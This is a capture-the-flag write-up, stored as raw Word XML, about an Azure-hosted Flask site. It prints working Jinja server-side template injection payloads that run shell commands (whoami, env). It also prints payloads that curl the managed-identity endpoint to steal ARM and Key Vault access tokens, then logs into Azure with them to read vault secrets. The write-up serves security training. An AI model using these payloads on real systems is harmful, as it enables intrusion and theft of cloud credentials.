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99FF8" w14:textId="1FD3B7F0" w:rsidR="00DF2342" w:rsidRPr="001E0946" w:rsidRDefault="00BD7CDB" w:rsidP="001E0946">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0946">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag out of web – Write Up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050F9EC7" w14:textId="77777777" w:rsidR="001E0946" w:rsidRDefault="001E0946"/>
    <w:p w14:paraId="18443061" w14:textId="7AFE33A1" w:rsidR="00BD7CDB" w:rsidRPr="001E0946" w:rsidRDefault="00BD7CDB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0946">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5D435" w14:textId="77777777" w:rsidR="00072972" w:rsidRDefault="00072972" w:rsidP="00072972">
      <w:r>
        <w:t xml:space="preserve">I have all my accounts enable MFA except the demo user from outlook.com access the new website under development </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154EC48" w14:textId="4F886A7E" w:rsidR="00072972" w:rsidRDefault="00072972" w:rsidP="00072972">
      <w:r>
        <w:t xml:space="preserve">and this account has no permission other than accessing the website. I am sure I am protecting my identity perfectly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16468616" w14:textId="77777777" w:rsidR="00072972" w:rsidRDefault="00072972" w:rsidP="00072972">
      <w:r>
        <w:t>The website under development: https://webchallengemocsctf.azurewebsites.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92C42C" w14:textId="3F6A4FD2" w:rsidR="00072972" w:rsidRDefault="00072972" w:rsidP="00072972">
      <w:r>
        <w:t>demo user:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>democtfuser@outlook.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40AADC" w14:textId="5B7C9F14" w:rsidR="001E0946" w:rsidRDefault="00072972" w:rsidP="00072972">
      <w:r>
        <w:t>password:M0CTF2023!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B55993" w14:textId="77777777" w:rsidR="00072972" w:rsidRDefault="00072972" w:rsidP="00072972"/>
    <w:p w14:paraId="6070504A" w14:textId="1214D88C" w:rsidR="001E0946" w:rsidRPr="00C77335" w:rsidRDefault="00C77335" w:rsidP="00BD7CDB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77335">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D29D3" w14:textId="650F34D4" w:rsidR="00C77335" w:rsidRDefault="00C77335" w:rsidP="00BD7CDB">
      <w:r>
        <w:t xml:space="preserve">First access the website after </w:t>
      </w:r>
      <w:r w:rsidR="00BD2285">
        <w:t>sign-in with demo user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D302A" w14:textId="5F2F4FB5" w:rsidR="00BD2285" w:rsidRDefault="005E6D83" w:rsidP="00BD7CDB">
      <w:r w:rsidRPr="005E6D83">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3511C133" wp14:editId="4DFAB944">
            <wp:extent cx="5943600" cy="216154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CD91" w14:textId="4DD8F71B" w:rsidR="005E6D83" w:rsidRDefault="005E6D83" w:rsidP="00BD7CDB">
      <w:r>
        <w:t>It says ‘give me a name’</w:t>
      </w:r>
      <w:r w:rsidR="00440D44">
        <w:t xml:space="preserve">, so try to </w:t>
      </w:r>
      <w:r w:rsidR="005C1D54">
        <w:t>add name parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6384C78A" w14:textId="4A44D8F1" w:rsidR="005C1D54" w:rsidRDefault="00C171B7" w:rsidP="00BD7CDB">
      <w:r w:rsidRPr="00C171B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E437BFA" wp14:editId="0DF80B47">
            <wp:extent cx="5886753" cy="1701887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2A9E" w14:textId="07FDD84C" w:rsidR="00C171B7" w:rsidRDefault="00C171B7" w:rsidP="00BD7CDB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The output will include the name parameter</w:t>
      </w:r>
      <w:r w:rsidR="00F50212">
        <w:t>. With more try, we can find the web page is vulnerable for SSTI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06A4E5" w14:textId="715322C9" w:rsidR="00F50212" w:rsidRDefault="00F76005" w:rsidP="00BD7CDB">
      <w:r w:rsidRPr="00F76005">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D6A6717" wp14:editId="7E13BA88">
            <wp:extent cx="5410478" cy="1320868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A2EF" w14:textId="2B12C382" w:rsidR="00F76005" w:rsidRDefault="007969D9" w:rsidP="00BD7CDB">
      <w:r>
        <w:t>Try to get the language used for this website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B175C8" w14:textId="7CA102CC" w:rsidR="007969D9" w:rsidRDefault="00B37D16" w:rsidP="00BD7CDB">
      <w:r w:rsidRPr="00B37D16">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F53589" wp14:editId="67985C1C">
            <wp:extent cx="5943600" cy="1053465"/>
            <wp:effectExtent l="0" t="0" r="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F9E6" w14:textId="19D2C9F8" w:rsidR="00B37D16" w:rsidRDefault="00B37D16" w:rsidP="00BD7CDB">
      <w:r>
        <w:t>Google a bit for the output we can get to know the website is built</w:t>
      </w:r>
      <w:r w:rsidR="009C320B">
        <w:t xml:space="preserve"> with Flask framework. And it’s hosted on Azure from </w:t>
      </w:r>
      <w:r w:rsidR="00792621">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="009C320B">
        <w:t>s URL.</w:t>
      </w:r>
      <w:r w:rsidR="00792621">
        <w:t xml:space="preserve"> Let’s enumerate more for user running the website and environment variable</w:t>
      </w:r>
      <w:r w:rsidR="00B24C39">
        <w:t xml:space="preserve"> to find more hints (If there is managed identity assigned to this web).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AE43E" w14:textId="77777777" w:rsidR="001417E1" w:rsidRDefault="001417E1" w:rsidP="00BD7CDB">
      <w:r>
        <w:t>Inject expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BB4C5B" w14:textId="77777777" w:rsidR="005603CE" w:rsidRDefault="005603CE" w:rsidP="001417E1">
      <w:r w:rsidRPr="005603CE">
        <w:t>{{config.__class__.__init__.__globals__[%27os%27].popen(%27whoami%27).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EED1BB" w14:textId="4A546DF2" w:rsidR="001417E1" w:rsidRDefault="005603CE" w:rsidP="001417E1">
      <w:r w:rsidRPr="005603CE">
        <w:t>{{config.__class__.__init__.__globals__[%27os%27].popen(%27</w:t>
      </w:r>
      <w:r>
        <w:t>env</w:t>
      </w:r>
      <w:r w:rsidRPr="005603CE">
        <w:t>%27).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A345A3C" w14:textId="22066744" w:rsidR="005603CE" w:rsidRDefault="00D21141" w:rsidP="001417E1">
      <w:r w:rsidRPr="00D21141">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB470D2" wp14:editId="363E31EF">
            <wp:extent cx="5943600" cy="78676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2917" w14:textId="22999101" w:rsidR="00D21141" w:rsidRDefault="008E3760" w:rsidP="001417E1">
      <w:r w:rsidRPr="008E3760">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="785C979F" wp14:editId="35C82BD0">
            <wp:extent cx="5943600" cy="311086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DB73" w14:textId="679A87B2" w:rsidR="00BF7073" w:rsidRDefault="00BF7073" w:rsidP="001417E1">
      <w:r>
        <w:t xml:space="preserve">Good! The website is run as root and we can see </w:t>
      </w:r>
      <w:r w:rsidR="006362DF">
        <w:t xml:space="preserve">IDENTITY_HEADER and IDENTITY_ENDPOINT in environment variables, there is managed identity </w:t>
      </w:r>
      <w:r w:rsidR="00214C0E">
        <w:t>assigned to this web. We can generate access token of the managed identity and later login to Azure as the managed identity to further explore!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB97E64" w14:textId="2C0EBCA5" w:rsidR="00A3595C" w:rsidRDefault="00A3595C" w:rsidP="00A3595C">
      <w:r>
        <w:t>Inject expression</w:t>
      </w:r>
      <w:r w:rsidR="00174716">
        <w:t xml:space="preserve"> (The way to get access token, the &amp; sign need to be changed to %26 otherwise </w:t>
      </w:r>
      <w:r w:rsidR="00B97444">
        <w:t>it will be parsed as separator of variable in the URL)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F643C41" w14:textId="6CCD452D" w:rsidR="00214C0E" w:rsidRDefault="000A7E2B" w:rsidP="000A7E2B">
      <w:r>
        <w:t>{{config.__class__.__init__.__globals__['os'].popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com</w:t>
      </w:r>
      <w:r>
        <w:t>%26</w:t>
      </w:r>
      <w:r>
        <w:t>api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD94DD" w14:textId="77777777" w:rsidR="0072396C" w:rsidRDefault="0072396C" w:rsidP="0072396C">
      <w:r>
        <w:t>{{config.__class__.__init__.__globals__['os'].popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net%26api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D1852D" w14:textId="7C0CD516" w:rsidR="001417E1" w:rsidRDefault="0072396C" w:rsidP="00BD7CDB">
      <w:r>
        <w:t xml:space="preserve">Generally we may generate access token for ARM (the first expression) first, but </w:t>
      </w:r>
      <w:r w:rsidR="00B42774">
        <w:t>for this challenge later we need KeyVault access token to access KeyVault</w:t>
      </w:r>
      <w:r w:rsidR="00BB4413">
        <w:t xml:space="preserve">, so in this writeup we also generate KeyVault access token </w:t>
      </w:r>
      <w:r w:rsidR="00352E97">
        <w:t>so that we don’t need to come back and generate KeyVault access token then login to Azure again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BED2F2" w14:textId="77777777" w:rsidR="00352E97" w:rsidRDefault="00352E97" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="7C064DBC" w14:textId="0C447212" w:rsidR="000F5932" w:rsidRDefault="000F5932" w:rsidP="00BD7CDB">
      <w:r>
        <w:t>With access token we can login to Azure</w:t>
      </w:r>
      <w:r w:rsidR="00A20CCF">
        <w:t xml:space="preserve"> with the managed identity of the web  (Need to install Az PowerShell module):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25453090" w14:textId="77777777" w:rsidR="00CB2EAD" w:rsidRDefault="00CB2EAD" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="3946DFE0" w14:textId="77777777" w:rsidR="00CB2EAD" w:rsidRDefault="00CB2EAD" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="0CE23139" w14:textId="77777777" w:rsidR="00CB2EAD" w:rsidRDefault="00CB2EAD" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="411D70F9" w14:textId="77777777" w:rsidR="00A20CCF" w:rsidRDefault="00A20CCF" w:rsidP="00A20CCF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$token="&lt;token from first expression output for ARM access token&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183DB6C" w14:textId="77777777" w:rsidR="00A20CCF" w:rsidRDefault="00A20CCF" w:rsidP="00A20CCF">
      <w:r>
        <w:t>$keyvaulttoken="&lt;token from second expression output for ARM access token&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F011D" w14:textId="5A858557" w:rsidR="00A20CCF" w:rsidRDefault="00A20CCF" w:rsidP="00A20CCF">
      <w:r>
        <w:t>Connect-AzAccount -AccessToken $token -AccountId &lt;IDENTITY_HEADER&gt; -KeyVaultAccessToken $keyvaulttoken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98A95C" w14:textId="77777777" w:rsidR="00F55F8A" w:rsidRDefault="00F55F8A" w:rsidP="00A20CCF"/>
    <w:p w14:paraId="3CEFBC38" w14:textId="22EEF51B" w:rsidR="000E0951" w:rsidRDefault="000E0951" w:rsidP="00A20CCF">
      <w:r w:rsidRPr="000E0951">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="443DC77A" wp14:editId="2A9DC02D">
            <wp:extent cx="6457950" cy="222923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5359" cy="223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170C" w14:textId="021A6182" w:rsidR="000E0951" w:rsidRDefault="009C0A57" w:rsidP="00A20CCF">
      <w:r>
        <w:t>After login to Azure we can do further enumeration by using “get-azresource” PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB23911" w14:textId="686483CF" w:rsidR="009C0A57" w:rsidRDefault="009C0A57" w:rsidP="00A20CCF">
      <w:r w:rsidRPr="009C0A57">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="732192E2" wp14:editId="318E01D1">
            <wp:extent cx="5943600" cy="747395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8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captur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931E" w14:textId="000375D7" w:rsidR="00987264" w:rsidRDefault="009C0A57" w:rsidP="00A20CCF">
      <w:r>
        <w:t>We can find the managed identity has access to a Key Vault</w:t>
      </w:r>
      <w:r w:rsidR="00987264">
        <w:t>. Try to get the information from the KeyVault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F1A3E" w14:textId="2563FD22" w:rsidR="00987264" w:rsidRDefault="00525FFD" w:rsidP="00A20CCF">
      <w:r w:rsidRPr="00525FFD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07F2BBCD" wp14:editId="11297919">
            <wp:extent cx="5943600" cy="15621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BF50" w14:textId="77777777" w:rsidR="00525FFD" w:rsidRDefault="00525FFD" w:rsidP="00A20CCF"/>
    <w:p w14:paraId="2922E241" w14:textId="77777777" w:rsidR="009C0A57" w:rsidRDefault="009C0A57" w:rsidP="00A20CCF"/>
    <w:p w14:paraId="697B054E" w14:textId="042A243F" w:rsidR="00F55F8A" w:rsidRDefault="00802EF4" w:rsidP="00A20CCF">
      <w:r w:rsidRPr="00802EF4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FBD3D88" wp14:editId="26FC89D4">
            <wp:extent cx="5943600" cy="2284730"/>
            <wp:effectExtent l="0" t="0" r="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8464" w14:textId="13B47D69" w:rsidR="00802EF4" w:rsidRDefault="004852D2" w:rsidP="00A20CCF">
      <w:r w:rsidRPr="004852D2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3BD733" wp14:editId="20C8257F">
            <wp:extent cx="5943600" cy="4546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75EF" w14:textId="77777777" w:rsidR="000721D5" w:rsidRDefault="000721D5" w:rsidP="00A20CCF"/>
    <w:p w14:paraId="567B1810" w14:textId="09EFF95E" w:rsidR="000721D5" w:rsidRDefault="000721D5" w:rsidP="00A20CCF">
      <w:r>
        <w:t xml:space="preserve">You get the flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="000721D5">
        <w:t>MOCSCTF{5erv1ce_@cc0unt_h@5_n0_MF@}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FEFF5B" w14:textId="77777777" w:rsidR="009C320B" w:rsidRDefault="009C320B" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="089456A3" w14:textId="77777777" w:rsidR="005C1D54" w:rsidRDefault="005C1D54" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="48D03736" w14:textId="77777777" w:rsidR="008C7CFD" w:rsidRDefault="008C7CFD" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="7A373A71" w14:textId="77777777" w:rsidR="008C7CFD" w:rsidRDefault="008C7CFD" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="400596A4" w14:textId="3170E606" w:rsidR="00BD7CDB" w:rsidRDefault="00BD7CDB" w:rsidP="00BD7CDB"/>
    <w:p w14:paraId="533542DB" w14:textId="77777777" w:rsidR="00BD7CDB" w:rsidRDefault="00BD7CDB" w:rsidP="00BD7CDB"/>
    <w:sectPr w:rsidR="00BD7C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CDB"/>
    <w:rsid w:val="000721D5"/>
    <w:rsid w:val="00072972"/>
    <w:rsid w:val="000A7E2B"/>
    <w:rsid w:val="000E0951"/>
    <w:rsid w:val="000F5932"/>
    <w:rsid w:val="001417E1"/>
    <w:rsid w:val="00174716"/>
    <w:rsid w:val="001E0946"/>
    <w:rsid w:val="00214C0E"/>
    <w:rsid w:val="00352E97"/>
    <w:rsid w:val="00440D44"/>
    <w:rsid w:val="004852D2"/>
    <w:rsid w:val="00514AA5"/>
    <w:rsid w:val="00525FFD"/>
    <w:rsid w:val="005603CE"/>
    <w:rsid w:val="005C1D54"/>
    <w:rsid w:val="005E6D83"/>
    <w:rsid w:val="006362DF"/>
    <w:rsid w:val="0072396C"/>
    <w:rsid w:val="00792621"/>
    <w:rsid w:val="007969D9"/>
    <w:rsid w:val="00802EF4"/>
    <w:rsid w:val="008C7CFD"/>
    <w:rsid w:val="008E3760"/>
    <w:rsid w:val="00987264"/>
    <w:rsid w:val="009C0A57"/>
    <w:rsid w:val="009C320B"/>
    <w:rsid w:val="00A20CCF"/>
    <w:rsid w:val="00A3595C"/>
    <w:rsid w:val="00A55F79"/>
    <w:rsid w:val="00B24C39"/>
    <w:rsid w:val="00B37D16"/>
    <w:rsid w:val="00B42774"/>
    <w:rsid w:val="00B97444"/>
    <w:rsid w:val="00BB4413"/>
    <w:rsid w:val="00BD2285"/>
    <w:rsid w:val="00BD7CDB"/>
    <w:rsid w:val="00BF7073"/>
    <w:rsid w:val="00C171B7"/>
    <w:rsid w:val="00C77335"/>
    <w:rsid w:val="00CB2EAD"/>
    <w:rsid w:val="00D21141"/>
    <w:rsid w:val="00DA0DAD"/>
    <w:rsid w:val="00DF2342"/>
    <w:rsid w:val="00EF7B12"/>
    <w:rsid w:val="00F50212"/>
    <w:rsid w:val="00F55F8A"/>
    <w:rsid w:val="00F76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34F43"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E9124D5E-5E18-4419-9D76-19EEBBA4A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429</Words>
  <Characters>2450</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>20</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Teru Gaming</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Teru Gaming</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-24T02:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-24T03:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>